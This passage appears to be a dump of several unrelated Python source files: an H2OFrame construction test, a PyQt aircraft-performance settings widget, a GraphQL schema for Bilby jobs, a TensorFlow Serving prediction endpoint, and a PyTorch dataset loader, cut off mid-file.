[3,2,2,2,2]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n python_obj = [[\"a\", \"b\"], [\"c\", \"d\"]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=2, cols=2)\n\n # d. jagged\n python_obj = [[6,7,8,9,10], [1,2,3,4], [3,2,2]]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n\n ## 2. tuple\n # a. single row\n python_obj = (1, \"a\", 2.5, \"bcd\", 0)\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n\n # b. single column\n python_obj = ((1,), (2,), (3.7,), (8,), (9,))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = ((6,7,8,9,10), (1,2,3,4,5), (3,2,2,2,2))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # d. jagged\n python_obj = ((6,7,8,9,10), (1,2,3,4), (3,2,2))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n ## 3. list-tuple mixed\n # a. single column\n python_obj = ((1,), [2], (3.7,), [8], (9,))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # b. single column\n python_obj = [(1,), [2], (3.7,), [8], (9,)]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = ([6,7,8,9,10], (1,2,3,4,5), [3,2,2,2,2])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # d. multiple rows, columns\n python_obj = [(6,7,8,9,10), [1,2,3,4,5], (3,2,2,2,2)]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # e. jagged\n python_obj = [(6,7,8,9,10), [1,2,3,4], (3,2,2)]\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n # f. jagged\n python_obj = ((6,7,8,9,10), [1,2,3,4], (3,2,2))\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5, dim_only=True)\n\n # 4. dictionary\n # a. single row\n python_obj = {\"a\":1, \"b\":\"a\", \"c\":2.5, \"d\":\"bcd\", \"e\":0}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n python_obj = {\"a\":[1], \"b\":[\"a\"], \"c\":[2.5], \"d\":[\"bcd\"], \"e\":[0]}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # b. single column\n python_obj = {\"foo\":(1,2,3.7,8,9)}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # c. multiple rows, columns\n python_obj = {\"foo\":[6,7,8,9,10], \"bar\":(1,2,3,4,5), \"baz\":(3,2,2,2,2)}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=3)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # d. jagged\n python_obj = {\"foo\":(6,7), \"bar\":(1,2,3,4), \"baz\":(3,2,2)}\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=4, cols=3, dim_only=True)\n assert set(the_frame.names) == set(python_obj.keys()), \"H2OFrame header is hosed. Got {0}, but should have got \" \\\n \"{1}\".format(the_frame.names, python_obj.keys())\n\n # 5. numpy.ndarray\n # a. single row\n python_obj = np.array([1, \"a\", 2.5, \"bcd\", 0])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=5)\n\n # b. single column\n python_obj = np.array([[1], [2], [3.7], [8], [9]])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = np.array([[6,7,8,9,10], [1,2,3,4,5], [3,2,2,2,2]])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n # d. jagged\n python_obj = np.array([[6,7,8,9,10], [1,2,3,4], [3,2,2]])\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=3, cols=5)\n\n ## 6. pandas.DataFrame\n # a. single row\n python_obj = pd.DataFrame({'foo' : pd.Series([1]), 'bar' : pd.Series([6]), 'baz' : pd.Series([\"a\"]) })\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=1, cols=3)\n\n # b. single column\n python_obj = pd.DataFrame({'foo' : pd.Series([1, 2, 3, 7.8, 9])})\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=1)\n\n # c. multiple rows, columns\n python_obj = pd.DataFrame({'foo' : pd.Series([6,7,8,9,10]), 'bar' : pd.Series([1,2,3,4,5]),\n 'baz' : pd.Series([3,2,2,2,2])})\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=3)\n\n # d. jagged\n python_obj = pd.DataFrame({'foo' : pd.Series([6,7,8]), 'bar' : pd.Series([1,2,3,4,5]), 'baz' : pd.Series([3,2,2,2])})\n the_frame = h2o.H2OFrame(python_obj)\n pyunit_utils.check_dims_values(python_obj, the_frame, rows=5, cols=3)\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(to_H2OFrame)\nelse:\n to_H2OFrame()\n"} {"ext": "py", "sha": "1a3103c1fcfad091e66562acbb5d1c324b6e4c8f", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n\n mslib.msui.performance_settings\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n This module defines the performance settings dialog\n\n This file is part of mss.\n\n :copyright: Copyright 2017 Joern Ungermann\n :copyright: Copyright 2017-2022 by the mss team, see AUTHORS.\n :license: APACHE-2.0, see LICENSE for details.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport json\n\nfrom PyQt5 import QtCore, QtWidgets\n\nfrom mslib.utils import FatalUserError\nfrom mslib.msui import aircrafts, constants\nfrom mslib.msui.mss_qt import get_open_filename\nfrom mslib.msui.mss_qt import ui_performance_dockwidget as ui_dw\n\n\nDEFAULT_PERFORMANCE = {\n \"aircraft\": aircrafts.SimpleAircraft(aircrafts.AIRCRAFT_DUMMY),\n \"visible\": False,\n \"takeoff_weight\": 0,\n \"takeoff_time\": QtCore.QDateTime.currentDateTimeUtc(),\n \"empty_weight\": 0,\n \"ceiling_alt\": [410],\n}\n\n\nclass MSS_PerformanceSettingsWidget(QtWidgets.QWidget, ui_dw.Ui_PerformanceDockWidget):\n \"\"\"\n This class implements setting the performance settings as a dockable widget.\n \"\"\"\n\n def __init__(self, parent=None, view=None, settings_dict=None):\n \"\"\"\n Arguments:\n parent -- Qt widget that is parent to this widget.\n view -- reference to mpl canvas class\n settings_dict -- dictionary containing topview options\n \"\"\"\n super(MSS_PerformanceSettingsWidget, self).__init__(parent)\n self.setupUi(self)\n self.view = view\n self.parent = parent\n\n if not settings_dict:\n settings_dict = DEFAULT_PERFORMANCE\n self.aircraft = settings_dict[\"aircraft\"]\n self.lbAircraftName.setText(self.aircraft.name)\n self.cbShowPerformance.setChecked(settings_dict[\"visible\"])\n self.dsbTakeoffWeight.setValue(settings_dict[\"takeoff_weight\"])\n self.dsbEmptyWeight.setValue(\n settings_dict.get(\"empty_weight\", settings_dict[\"takeoff_weight\"] - settings_dict.get(\"fuel\", 0)))\n self.dteTakeoffTime.setDateTime(settings_dict[\"takeoff_time\"])\n\n # Connecting signals\n self.pbLoadPerformance.clicked.connect(self.load_performance)\n self.cbShowPerformance.stateChanged.connect(self.update_parent_performance)\n self.dteTakeoffTime.dateTimeChanged.connect(self.update_parent_performance)\n self.dsbTakeoffWeight.valueChanged.connect(self.update_parent_performance)\n self.dsbEmptyWeight.valueChanged.connect(self.update_parent_performance)\n\n def get_settings(self):\n \"\"\"\n Encapsulates GUI selections in a python dictionary.\n\n :return:\n Dictionary of all setting informations\n \"\"\"\n settings_dict = {\n \"aircraft\": self.aircraft,\n \"visible\": self.cbShowPerformance.isChecked(),\n \"takeoff_time\": self.dteTakeoffTime.dateTime(),\n \"takeoff_weight\": self.dsbTakeoffWeight.value(),\n \"empty_weight\": self.dsbEmptyWeight.value()\n }\n return settings_dict\n\n def update_parent_performance(self):\n self.parent.setPerformance(self.get_settings())\n\n def load_performance(self):\n \"\"\"\n Gets a filename for a JSON file specifying aircraft performance and initializes an SimpleAircraft model.\n \"\"\"\n filename = get_open_filename(\n self, \"Open Aircraft Performance JSON File\", constants.MSS_CONFIG_PATH,\n \"Performance File (*.json)\", pickertag=\"filepicker_default\")\n if filename is not None:\n try:\n with open(filename) as tf:\n performance = json.load(tf)\n self.aircraft = aircrafts.SimpleAircraft(performance)\n self.lbAircraftName.setText(self.aircraft.name)\n self.dsbTakeoffWeight.setValue(self.aircraft.takeoff_weight)\n if not any(hasattr(self.aircraft, _x) for _x in (\"fuel\", \"empty_weight\")):\n raise KeyError(\"empty_weight\")\n if hasattr(self.aircraft, \"empty_weight\"):\n self.dsbEmptyWeight.setValue(self.aircraft.empty_weight)\n else:\n self.dsbEmptyWeight.setValue(self.aircraft.takeoff_weight - self.aircraft.fuel)\n\n self.update_parent_performance()\n\n except KeyError as ex:\n QtWidgets.QMessageBox.critical(self, self.tr(\"Performance JSON Load\"),\n self.tr(f\"JSON File missing '{ex}' entry\"))\n except (FatalUserError, ValueError) as ex:\n QtWidgets.QMessageBox.critical(self, self.tr(\"Performance JSON Load\"),\n self.tr(f\"JSON File has Syntax Problems:\\n{ex}\"))\n"} {"ext": "py", "sha": "1a31053b4ca3d68aa8882dcde6023d66256beb2d", "content": "from decimal import Decimal\n\nimport graphene\nfrom django_filters import FilterSet, OrderingFilter\nfrom graphene import relay\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphene_django.types import DjangoObjectType\nfrom graphene_file_upload.scalars import Upload\nfrom graphql import GraphQLError\nfrom graphql_jwt.decorators import login_required\nfrom graphql_relay.node.node import from_global_id, to_global_id\n\nfrom .models import BilbyJob, Label, FileDownloadToken, BilbyJobUploadToken\nfrom .status import JobStatus\nfrom .types import JobStatusType, BilbyJobCreationResult, JobParameterInput, JobParameterOutput, JobIniInput, \\\n JobDetailsInput\nfrom .utils.db_search.db_search import perform_db_search\nfrom .utils.derive_job_status import derive_job_status\nfrom .utils.gen_parameter_output import generate_parameter_output\nfrom .utils.jobs.request_file_download_id import request_file_download_ids\nfrom .utils.jobs.request_job_filter import request_job_filter\nfrom .views import create_bilby_job, update_bilby_job, create_bilby_job_from_ini_string, upload_bilby_job\n\n\nclass LabelType(DjangoObjectType):\n class Meta:\n model = Label\n interfaces = (relay.Node,)\n\n\nclass UserBilbyJobFilter(FilterSet):\n class Meta:\n model = BilbyJob\n fields = '__all__'\n\n order_by = OrderingFilter(\n fields=(\n ('last_updated', 'lastUpdated'),\n ('name', 'name'),\n )\n )\n\n @property\n def qs(self):\n return BilbyJob.user_bilby_job_filter(super(UserBilbyJobFilter, self).qs, self)\n\n\nclass PublicBilbyJobFilter(FilterSet):\n class Meta:\n model = BilbyJob\n fields = '__all__'\n\n order_by = OrderingFilter(\n fields=(\n ('last_updated', 'last_updated'),\n ('name', 'name'),\n )\n )\n\n @property\n def qs(self):\n return BilbyJob.public_bilby_job_filter(super(PublicBilbyJobFilter, self).qs, self)\n\n\nclass BilbyJobNode(DjangoObjectType):\n class Meta:\n model = BilbyJob\n convert_choices_to_enum = False\n interfaces = (relay.Node,)\n\n job_status = graphene.Field(JobStatusType)\n last_updated = graphene.String()\n params = graphene.Field(JobParameterOutput)\n labels = graphene.List(LabelType)\n\n @classmethod\n def get_queryset(parent, queryset, info):\n return BilbyJob.bilby_job_filter(queryset, info)\n\n def resolve_last_updated(parent, info):\n return parent.last_updated.strftime(\"%Y-%m-%d %H:%M:%S UTC\")\n\n def resolve_params(parent, info):\n return generate_parameter_output(parent)\n\n def resolve_labels(parent, info):\n return parent.labels.all()\n\n def resolve_job_status(parent, info):\n # Uploaded jobs are always complete\n if parent.is_uploaded_job:\n return {\n \"name\": JobStatus.display_name(JobStatus.COMPLETED),\n \"number\": JobStatus.COMPLETED,\n \"date\": parent.creation_time\n }\n\n try:\n # Get job details from the job controller\n _, jc_jobs = request_job_filter(\n info.context.user.user_id,\n ids=[parent.job_controller_id]\n )\n\n status_number, status_name, status_date = derive_job_status(jc_jobs[0][\"history\"])\n\n return {\n \"name\": status_name,\n \"number\": status_number,\n \"date\": status_date.strftime(\"%Y-%m-%d %H:%M:%S UTC\")\n }\n except Exception:\n return {\n \"name\": \"Unknown\",\n \"number\": 0,\n \"data\": \"Unknown\"\n }\n\n\nclass UserDetails(graphene.ObjectType):\n username = graphene.String()\n\n def resolve_username(parent, info):\n return \"Todo\"\n\n\nclass BilbyResultFile(graphene.ObjectType):\n path = graphene.String()\n is_dir = graphene.Boolean()\n file_size = graphene.Decimal()\n download_token = graphene.String()\n\n\nclass BilbyResultFiles(graphene.ObjectType):\n class Meta:\n interfaces = (relay.Node,)\n\n class Input:\n job_id = graphene.ID()\n\n files = graphene.List(BilbyResultFile)\n is_uploaded_job = graphene.Boolean()\n\n\nclass BilbyPublicJobNode(graphene.ObjectType):\n user = graphene.String()\n name = graphene.String()\n job_status = graphene.Field(JobStatusType)\n labels = graphene.List(LabelType)\n description = graphene.String()\n timestamp = graphene.String()\n id = graphene.ID()\n\n\nclass BilbyPublicJobConnection(relay.Connection):\n class Meta:\n node = BilbyPublicJobNode\n\n\nclass GenerateBilbyJobUploadToken(graphene.ObjectType):\n token = graphene.String()\n\n\nclass Query(object):\n bilby_job = relay.Node.Field(BilbyJobNode)\n bilby_jobs = DjangoFilterConnectionField(BilbyJobNode, filterset_class=UserBilbyJobFilter)\n public_bilby_jobs = relay.ConnectionField(\n BilbyPublicJobConnection,\n search=graphene.String(),\n time_range=graphene.String()\n )\n\n all_labels = graphene.List(LabelType)\n\n bilby_result_files = graphene.Field(BilbyResultFiles, job_id=graphene.ID(required=True))\n\n gwclouduser = graphene.Field(UserDetails)\n\n generate_bilby_job_upload_token = graphene.Field(GenerateBilbyJobUploadToken)\n\n @login_required\n def resolve_generate_bilby_job_upload_token(self, info, **kwargs):\n user = info.context.user\n\n # Create a job upload token\n token = BilbyJobUploadToken.create(user)\n\n # Return the generated token\n return GenerateBilbyJobUploadToken(token=str(token.token))\n\n @login_required\n def resolve_all_labels(self, info, **kwargs):\n return Label.all()\n\n @login_required\n def resolve_public_bilby_jobs(self, info, **kwargs):\n # Perform the database search\n success, jobs = perform_db_search(info.context.user, kwargs)\n if not success:\n return []\n\n # Parse the result in to graphql objects\n result = []\n for job in jobs:\n bilby_job = BilbyJob.get_by_id(job['job']['id'], info.context.user)\n result.append(\n BilbyPublicJobNode(\n user=f\"{job['user']['firstName']} {job['user']['lastName']}\",\n name=job['job']['name'],\n description=job['job']['description'],\n job_status=JobStatusType(\n name=JobStatus.display_name(\n JobStatus.COMPLETED if bilby_job.is_uploaded_job else job['history'][0]['state']\n ),\n number=JobStatus.COMPLETED if bilby_job.is_uploaded_job else job['history'][0]['state'],\n date=bilby_job.creation_time if bilby_job.is_uploaded_job else job['history'][0]['timestamp']\n ),\n labels=bilby_job.labels.all(),\n timestamp=bilby_job.creation_time if bilby_job.is_uploaded_job else job['history'][0]['timestamp'],\n id=to_global_id(\"BilbyJobNode\", job['job']['id'])\n )\n )\n\n # Nb. The perform_db_search function currently requests one extra record than kwargs['first'].\n # This triggers the ArrayConnection used by returning the result array to correctly set\n # hasNextPage correctly, such that infinite scroll works as expected.\n return result\n\n @login_required\n def resolve_gwclouduser(self, info, **kwargs):\n return info.context.user\n\n @login_required\n def resolve_bilby_result_files(self, info, **kwargs):\n # Get the model id of the bilby job\n _, job_id = from_global_id(kwargs.get(\"job_id\"))\n\n # Try to look up the job with the id provided\n job = BilbyJob.get_by_id(job_id, info.context.user)\n\n # Fetch the file list from the job controller\n success, files = job.get_file_list()\n if not success:\n raise Exception(\"Error getting file list. \" + str(files))\n\n # Generate download tokens for the list of files\n paths = [f['path'] for f in filter(lambda x: not x['isDir'], files)]\n tokens = FileDownloadToken.create(job, paths)\n\n # Generate a dict that can be used to query the generated tokens\n token_dict = {tk.path: tk.token for tk in tokens}\n\n # Build the resulting file list and send it back to the client\n result = [\n BilbyResultFile(\n path=f[\"path\"],\n is_dir=f[\"isDir\"],\n file_size=Decimal(f[\"fileSize\"]),\n download_token=token_dict[f[\"path\"]] if f[\"path\"] in token_dict else None\n )\n for f in files\n ]\n\n return BilbyResultFiles(\n files=result,\n is_uploaded_job=job.is_uploaded_job\n )\n\n\nclass BilbyJobMutation(relay.ClientIDMutation):\n class Input:\n params = JobParameterInput()\n\n result = graphene.Field(BilbyJobCreationResult)\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, params):\n user = info.context.user\n\n # Create the bilby job\n bilby_job = create_bilby_job(user, params)\n\n # Convert the bilby job id to a global id\n job_id = to_global_id(\"BilbyJobNode\", bilby_job.id)\n\n # Return the bilby job id to the client\n return BilbyJobMutation(\n result=BilbyJobCreationResult(job_id=job_id)\n )\n\n\nclass BilbyJobFromIniStringMutation(relay.ClientIDMutation):\n class Input:\n params = JobIniInput()\n\n result = graphene.Field(BilbyJobCreationResult)\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, params):\n user = info.context.user\n\n # Create the bilby job\n bilby_job = create_bilby_job_from_ini_string(user, params)\n\n # Convert the bilby job id to a global id\n job_id = to_global_id(\"BilbyJobNode\", bilby_job.id)\n\n # Return the bilby job id to the client\n return BilbyJobFromIniStringMutation(\n result=BilbyJobCreationResult(job_id=job_id)\n )\n\n\nclass UpdateBilbyJobMutation(relay.ClientIDMutation):\n class Input:\n job_id = graphene.ID(required=True)\n private = graphene.Boolean(required=False)\n labels = graphene.List(graphene.String, required=False)\n\n result = graphene.String()\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, **kwargs):\n user = info.context.user\n\n job_id = kwargs.pop(\"job_id\")\n\n # Update privacy of bilby job\n message = update_bilby_job(from_global_id(job_id)[1], user, **kwargs)\n\n # Return the bilby job id to the client\n return UpdateBilbyJobMutation(\n result=message\n )\n\n\nclass GenerateFileDownloadIds(relay.ClientIDMutation):\n class Input:\n job_id = graphene.ID(required=True)\n download_tokens = graphene.List(graphene.String, required=True)\n\n result = graphene.List(graphene.String)\n\n @classmethod\n @login_required\n def mutate_and_get_payload(cls, root, info, job_id, download_tokens):\n user = info.context.user\n\n # Get the job these file downloads are for\n job = BilbyJob.get_by_id(from_global_id(job_id)[1], user)\n\n # Verify the download tokens and get the paths\n paths = FileDownloadToken.get_paths(job, download_tokens)\n\n # Check that all tokens were found\n if None in paths:\n raise GraphQLError(\"At least one token was invalid or expired.\")\n\n # For uploaded jobs, we can just return the exact some download tokens - this function is basically a no-op\n # for uploaded jobs\n if job.is_uploaded_job:\n return GenerateFileDownloadIds(\n result=download_tokens\n )\n\n # Request the list of file download ids from the list of paths\n # Only the original job author may generate a file download id\n success, result = request_file_download_ids(\n job,\n paths\n )\n\n # Report the error if there is one\n if not success:\n raise GraphQLError(result)\n\n # Return the list of file download ids\n return GenerateFileDownloadIds(\n result=result\n )\n\n\nclass UploadBilbyJobMutation(relay.ClientIDMutation):\n class Input:\n upload_token = graphene.String()\n details = JobDetailsInput()\n job_file = Upload(required=True)\n\n result = graphene.Field(BilbyJobCreationResult)\n\n @classmethod\n def mutate_and_get_payload(cls, root, info, upload_token, details, job_file):\n # Get the token being used to perform the upload - this will return None if the token doesn't exist or\n # is expired\n token = BilbyJobUploadToken.get_by_token(upload_token)\n if not token:\n raise GraphQLError(\"Job upload token is invalid or expired.\")\n\n # Try uploading the bilby job\n bilby_job = upload_bilby_job(token, details, job_file)\n\n # Convert the bilby job id to a global id\n job_id = to_global_id(\"BilbyJobNode\", bilby_job.id)\n\n # Return the bilby job id to the client\n return BilbyJobMutation(\n result=BilbyJobCreationResult(job_id=job_id)\n )\n\n\nclass Mutation(graphene.ObjectType):\n new_bilby_job = BilbyJobMutation.Field()\n new_bilby_job_from_ini_string = BilbyJobFromIniStringMutation.Field()\n update_bilby_job = UpdateBilbyJobMutation.Field()\n generate_file_download_ids = GenerateFileDownloadIds.Field()\n upload_bilby_job = UploadBilbyJobMutation.Field()\n"} {"ext": "py", "sha": "1a310622a120177fc756747cbe7a63947853cc94", "content": "from grpc.beta import implementations\nimport numpy\nimport traceback\n\nimport tensorflow as tf\n\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2\n\nfrom flask_restplus import Resource, abort\n\nfrom monocker_api.api.restplus import restplus_api\nfrom monocker_api.api.models import getModel\nfrom monocker_api.db.data_models import PredictionRequest\nfrom monocker_api import settings\n\n#==============================================================================\n# helper functions\n#==============================================================================\ndef getMonockerModelStub(host, port):\n try:\n channel = implementations.insecure_channel(host, int(port))\n stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)\n except Exception as e:\n print(\"===========================================================\")\n print(\"Encountered error while requesting gRPC connection.\")\n print(\"Error: \")\n print(e)\n traceback.print_exc()\n print(\"===========================================================\")\n stub = None\n return stub\n\n\ndef getServingRequest(model, payload):\n request = predict_pb2.PredictRequest()\n request.model_spec.name = model['model_name']\n request.model_spec.signature_name = model['model_signature']\n\n request.inputs['images'].CopyFrom(\n tf.contrib.util.make_tensor_proto(\n payload['model_input'], \n shape=payload['model_input_shape']\n )\n )\n\n return request\n#==============================================================================\n\n\n#==============================================================================\n# Models API \n#==============================================================================\n# define namespace\napi = restplus_api.namespace(\n 'predict', \n description=\"Operations related to requesting model evaluations\"\n)\n\n# Define /models route handlers\n@api.route('/')\nclass Models(Resource):\n @api.response(501, 'Error in model computation')\n @api.response(403, 'Could not connect to tf serving server')\n @api.response(404, 'Model not found.')\n @api.response(201, 'Successfully retrieved model evaluation.')\n @api.expect(PredictionRequest, validate=False, required=True)\n def post(self):\n # get inputs\n payload = restplus_api.payload\n\n # get model\n model = getModel(payload['model_name'])\n if model is None:\n return 'Model not found.', 404\n\n # get request\n model['model_signature'] = payload['model_signature']\n serving_request = getServingRequest(model, payload)\n\n # get stub\n stub = getMonockerModelStub(model['ip_address'], model['port'])\n if stub is None:\n return 'Could not connect to tf serving server', 403\n\n # make grpc prediction request then return results\n try:\n prediction = stub.Predict(serving_request, 5.0)\n model_response = list(prediction.outputs['scores'].float_val)\n return {'model_response': model_response}, 201\n\n except Exception as e:\n return str(e), 501\n \n#=============================================================================="} {"ext": "py", "sha": "1a31065f212693721a6525e296f7ea11f5f304b5", "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.utils.data as data\nfrom torchvision import transforms\nimport os\nimport pickle\nimport random\nimport pdb\nimport sys\nimport json\nfrom PIL import Image\n\nsys.path.insert(0, '.')\n\nimport numpy as np\nfrom skimage import io\n\n\ndef Context_dataset(args, embedding_size):\n # Random seed\n np.random.seed(args.seed)\n\n # Getting the classes and annotations\n # ******\n data_path = args.data_path\n with open(data_path+'/Context/data/split_'+ str(args.split) +'.json','r') as fp:\n gt_annotations = json.load(fp)\n\n # Load Embedding according to OCR\n if args.embedding == 'w2vec' or args.embedding == 'fasttext' or args.embedding == 'glove' or args.embedding == 'bert':\n if args.ocr == 'google_ocr':\n with open(data_path + '/Context/' + args.ocr + '/text_embeddings/Context_' + args.embedding + '.json', 'r') as fp:\n text_embedding = json.load(fp)\n else:\n with open(data_path + '/Context/' + args.ocr + '/text_embeddings/Context_' + args.embedding + '.pickle','rb') as fp:\n text_embedding = pickle.load(fp)\n elif args.embedding =='phoc':\n text_embedding = {'embedding':'phoc'}\n elif args.embedding == 'fisher':\n text_embedding = {'embedding':'fisher'}\n else:\n print('OCR SELECTED NOT IMPLEMENTED')\n\n # Load Local features from Faster R-CNN VG\n\n with open(args.data_path + '/Context/context_local_feats.npy', 'rb') as fp:\n local_feats = np.load(fp, encoding='bytes')\n\n # Create img_name to index of local features\n with open(args.data_path + '/Context/context_local_feats_image_ids.txt', 'r') as fp:\n image_ids = fp.readlines()\n image_name2features_index = {}\n for item in image_ids:\n img_name = item.strip().split(',')[0].split('/')[-1].replace('\\'', '')\n idx = item.strip().split(',')[1].replace(')', '').replace(' ','')\n image_name2features_index[img_name] = idx\n\n # BBOXES LOADING FOR TEXT FEATURES\n # Load BBOXES of Scene Text\n with open(data_path + '/Context/google_ocr/bboxes/Context_bboxes.json', 'r') as fp:\n text_bboxes = json.load(fp)\n\n # Load BBOXES of Local Visual Features\n with open(data_path + '/Context/context_bboxes.npy', 'rb') as fp:\n local_bboxes = np.load(fp, encoding='bytes')\n\n\n # Data Loaders\n\n train_transform = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.RandomRotation(degrees=15),\n transforms.ColorJitter(),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n train_loader = Context_Train(args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, train_transform)\n\n test_transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n test_loader = Context_Test(args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, test_transform)\n\n return train_loader, test_loader, gt_annotations, text_embedding\n\n\nclass Context_Train(data.Dataset):\n def __init__(self, args, gt_annotations, text_embedding, embedding_size, local_feats, image_name2features_index, text_bboxes, local_bboxes, transform=None):\n\n self.args = args\n self.gt_annotations = gt_annotations\n self.text_embedding = text_embedding\n self.embedding_size = embedding_size\n self.transform = transform\n self.image_list = list(gt_annotations['train'].keys())\n\n self.image_name2features_index = image_name2features_index\n self.local_feats = local_feats\n self.text_bboxes = text_bboxes\n self.local_bboxes = local_bboxes\n\n def __len__(self):\n return len(self.gt_annotations['train'])\n\n def __getitem__(self, index):\n data_path = self.args.data_path\n assert index <= len(self), 'index range error'\n\n image_name = self.image_list[index].rstrip()\n image_path = data_path+'/Context/data/JPEGImages/' + image_name\n img = Image.open(image_path).convert('RGB')\n if self.transform:\n img = self.transform(img)\n\n img_class = self.gt_annotations['train'][image_name]\n label = np.zeros(28)\n label[int(img_class) - 1] = 1\n label = torch.from_numpy(label)\n label = label.type(torch.FloatTensor)\n\n if self.args.embedding == 'w2vec' or self.args.embedding == 'fasttext' or self.args.embedding == 'glove' or self.args.embedding == 'bert':\n text_embedding = np.asarray(self.text_embedding[image_name])\n elif self.args.embedding == 'phoc':\n with open (data_path + '/Context/yolo_phoc/'+image_name[:-3]+'json') as fp:\n phocs = json.load(fp)\n text_embedding = np.resize(phocs, (np.shape(phocs)[0], 604))\n elif self.args.embedding == 'fisher':\n if self.args.ocr == 'yolo_phoc':\n relative_path = '/Context/old_fisher_vectors/'\n elif self.args.ocr == 'e2e_mlt':\n relative_path = '/Context/fasttext_fisher/'\n else: print('Not Implemented')\n with open (data_path + relative_path +image_name[:-3]+'json')as fp:\n fisher_vector = json.load(fp)\n text_embedding = np.resize(fisher_vector, (1, 38400))\n # FISHER VECTORS DO NOT NEED MAX TEXTUAL\n if self.args.embedding != 'fisher':\n text_features = np.zeros((self.args.max_textual, self.embedding_size))\n if np.shape(text_embedding)[0] == 0:\n text_embedding = np.zeros((1,self.embedding_size))\n elif np.shape(text_embedding)[0] > self.args.max_textual:\n text_embedding = text_embedding[0:self.args.max_textual]\n text_features[:len(text_embedding)] = text_embedding\n else:\n text_features = text_embedding\n\n text_features = torch.from_numpy(text_features)\n text_features = text_features.type(torch.FloatTensor)\n\n # SCENE TEXT BBOXES ONLY FOR GOOGLE OCR\n 